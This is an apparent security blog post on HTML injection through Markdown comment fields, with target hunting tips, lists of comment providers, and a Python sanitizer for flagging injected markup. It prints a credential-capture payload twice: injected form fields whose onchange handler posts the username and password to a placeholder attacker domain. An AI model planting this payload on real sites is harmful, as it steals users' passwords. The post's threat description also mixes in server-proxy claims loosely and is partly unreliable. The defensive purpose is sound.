Hackers Exploiting Markdown’s Functions to Run Malicious Campaigns

Kongsec
3 min read · Mar 13, 2024

Hello readers! I’m Aditya Shende aka Kongsec, Bounty Hunter, Biker, and Security Researcher from India. In today’s fast-evolving technological landscape, ensuring user privacy and security is more critical than ever. In this blog, we’ll explore a concerning trend in cybersecurity: hackers abusing the ‘Markdown’ feature of web applications to run malicious campaigns. Join me as we go through the details of this threat, real-time hunting, mitigations, and detection methods.

Understanding Markdown in Web Applications

Markdown is a lightweight markup language that simplifies formatting plain text in web applications and digital platforms. It offers a user-friendly syntax that transforms plain text into polished content, making it a preferred choice for platforms like GitHub and Reddit. Despite its simplicity, Markdown is powerful, allowing users to create structured documents without writing HTML by hand.

Key features include:

  • Headings: Denoted by a single #, indicating Heading 1.
  • Lists: Bullet points created effortlessly with a dash and space.
  • Text emphasis: Bold with double asterisks ** or italics with single asterisks *.

Markdown enhances readability and ease of use, making it popular for content creation across various digital landscapes.

Understanding the Threat: What? Who? Where?

What:

These kinds of attacks involve sending crafted requests to vulnerable servers, turning them into attack proxies. Attackers embed malicious scripts or tags in content the server renders for other users, enabling data exfiltration with a simple click or mouseover.

Who:

Almost every server that renders user-supplied markup is a potential target. Targets may include public third-party systems, internal organization systems, or services on the local loopback adapter of the application server.

Where:

Attackers often exploit markdown rendering in sections like “Reply,” “Comment,” and “Share article,” for instance by inserting tag-based payloads into comment boxes that accept markdown.

Escalated Attack: Capturing Auto-filled Passwords

<b>Username:</><br>
<input name=username id=username>
<b>Password:</><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.malicious-server.com',{
  method:'POST',
  mode:'no-cors',
  body:username.value+':'+this.value
});">

When this markup is rendered inside a page, the injected form captures the username and password and sends them to the attacker’s server as soon as the password field receives a value, whether typed by the user or auto-filled by the browser’s password manager.

Checking Affected Applications

  • Hunter.io
  • Wappalyzer
  • Dorking: Use dorks and Wappalyzer manually to check affected services.

Domains to Watch

  • forum.site.com: Discussions and conversations.
  • community.site.com: Building a sense of community.
  • help.site.com: Support and assistance discussions.
  • blog.site.com: Platforms for publishing articles or updates.

These domains encourage community interactions, making them susceptible to markdown-based attacks.

Common Service Providers:

  • Disqus
  • Commento
  • Hyvor Talk
  • Muut
  • IntenseDebate
  • Livefyre
  • GraphComment
  • SolidOpinion
  • Coral by Vox Media

Mitigation Steps:

  1. Automated Flagging: Service owners can implement automation to flag malicious embedded comments.
  2. Blacklisting Domains: Blacklist potentially harmful domain extensions (e.g., .net, .sh, .xyz) often used in payloads.
  3. URL Restrictions: Disallow servers from reading embedded URLs in payloads to prevent external service interactions, mitigating risks like Origin IP exposure and internal headers disclosure.
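As an added example that is not part of the original post, here is what mitigation 1 looks like in code: a standard-library-only allowlist sanitizer for the HTML a Markdown renderer emits, which strips anything outside the allowlist and records findings so the comment can be flagged for review. It is run over the credential-capture payload from above with a placeholder collector domain; the allowlists, CommentSanitizer and sanitize_comment are my own names and assumptions, not the post’s or any provider’s code.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit
# Allowlist of what a Markdown renderer legitimately emits for a comment (assumed set).
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "ul", "ol", "li", "h1", "h2", "h3", "code", "pre", "blockquote", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
ALLOWED_SCHEMES = {"", "http", "https", "mailto"}  # "" keeps relative URLs

class CommentSanitizer(HTMLParser):
    """Drops tags/attributes outside the allowlist and records why."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.findings = [], []

    def handle_starttag(self, tag, attrs):
        handlers = [n for n, _ in attrs if n.startswith("on")]
        if handlers:  # onchange/onmouseover/...: the exfiltration trigger
            self.findings.append(f"event handler {handlers} on <{tag}>")
        if tag not in ALLOWED_TAGS:  # input, form, script, iframe, ...
            self.findings.append(f"disallowed tag <{tag}>")
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # unknown attribute on an allowed tag: silently dropped
            if name == "href" and urlsplit(value or "").scheme.lower() not in ALLOWED_SCHEMES:
                self.findings.append(f"blocked URL scheme in href: {value}")
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # text is re-escaped, never trusted

def sanitize_comment(html):
    # Returns (clean_html, findings); non-empty findings => flag the comment for review.
    s = CommentSanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out), s.findings

# Constructed sample: the post's credential-capture payload with a placeholder domain.
PAYLOAD = ("<b>Username:</><br><input name=username id=username>"
           '<b>Password:</><br><input type=password name=password onchange="'
           "if(this.value.length)fetch('https://collector.attacker.example',"
           "{method:'POST',mode:'no-cors',body:username.value+':'+this.value});\">")
```

Running `sanitize_comment(PAYLOAD)` leaves only the harmless `<b>` and `<br>` tags and returns three findings (two disallowed `<input>` tags and the `onchange` handler), which is the signal the automated flagging in step 1 would act on.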

As cybersecurity threats evolve, it’s crucial for service providers and users alike to stay vigilant and implement robust mitigation measures. Let’s work together to make the digital landscape safer for everyone. Stay secure!
